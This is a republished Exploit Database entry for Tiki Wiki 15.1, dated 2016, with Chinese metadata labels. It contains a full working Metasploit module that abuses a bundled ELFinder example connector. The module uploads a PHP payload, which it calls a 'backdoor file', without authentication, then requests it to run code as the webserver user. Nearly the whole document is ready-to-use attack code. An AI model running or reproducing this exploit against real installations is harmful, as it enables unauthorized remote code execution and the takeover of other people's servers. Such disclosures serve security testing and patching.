Tiki Wiki 15.1 – File Upload (Metasploit)

• Exploit Database
• 18 阅读

• 作者： Mehmet Ince
  日期： 2016-07-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40091/

• ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  
  class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'Tiki Wiki Unauthenticated File Upload Vulnerability',
  'Description'=> %q{
  This module exploits a file upload vulnerability in Tiki Wiki <= 15.1
  which could be abused to allow unauthenticated users to execute arbitrary code
  under the context of the webserver user.
  
  The issue comes with one of the 3rd party components. Name of that components is
  ELFinder -version 2.0-. This components comes with default example page which
  demonstrates file operations such as upload, remove, rename, create directory etc.
  Default configuration does not force validations such as file extension, content-type etc.
  Thus, unauthenticated user can upload PHP file.
  
  The exploit has been tested on Debian 8.x 64bit and Tiki Wiki 15.1.
  },
  'Author' =>
  [
  'Mehmet Ince <mehmet@mehmetince.net>' # Vulnerability discovery and Metasploit module
  ],
  'License'=> MSF_LICENSE,
  'References' =>
  [
  [ 'URL', 'https://www.mehmetince.net/exploit/tiki-wiki-unauthenticated-file-upload-vulnerability' ],
  [ 'URL', 'https://tiki.org/article434-Security-update-Tiki-15-2-Tiki-14-4-and-Tiki-12-9-released' ]
  ],
  'Privileged' => false,
  'Platform' => ['php'],
  'Arch' => ARCH_PHP,
  'Payload'=>
  {
  'DisableNops' => true
  },
  'Targets'=> [ ['Automatic', {}] ],
  'DefaultTarget'=> 0,
  'DisclosureDate' => 'Jul 11 2016'
  ))
  
  register_options(
  [
  OptString.new('TARGETURI', [ true, "Installed path of Tiki Wiki", "/tiki/"])
  ], self.class)
  end
  
  def check
  url = normalize_uri(target_uri.path, "vendor_extra/elfinder/elfinder.html")
  res = send_request_cgi(
  'method' => 'GET',
  'uri' => normalize_uri(url)
  )
  if res && res.code == 200
  return Exploit::CheckCode::Appears
  end
  return Exploit::CheckCode::Safe
  end
  
  def exploit
  filename = rand_text_alpha(8 + rand(4)) + '.php'
  data = Rex::MIME::Message.new
  data.add_part('upload', nil, nil, 'form-data; name="cmd"')
  data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
  data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")
  print_status("Uploading backdoor file.")
  res = send_request_cgi({
  'method' => 'POST',
  'uri'=> normalize_uri(target_uri.path, "vendor_extra/elfinder/php/connector.minimal.php"),
  'ctype'=> "multipart/form-data; boundary=#{data.bound}",
  'data' => data.to_s
   })
  if res && res.code == 200
  print_good("Backdoor successfully created.")
  else
  fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
  end
  print_status("Trigging the exploit...")
  send_request_cgi({
  'method'=> 'GET',
  'uri' => normalize_uri(target_uri.path, "vendor_extra/elfinder/files/" + filename)
   }, 5)
  end
  end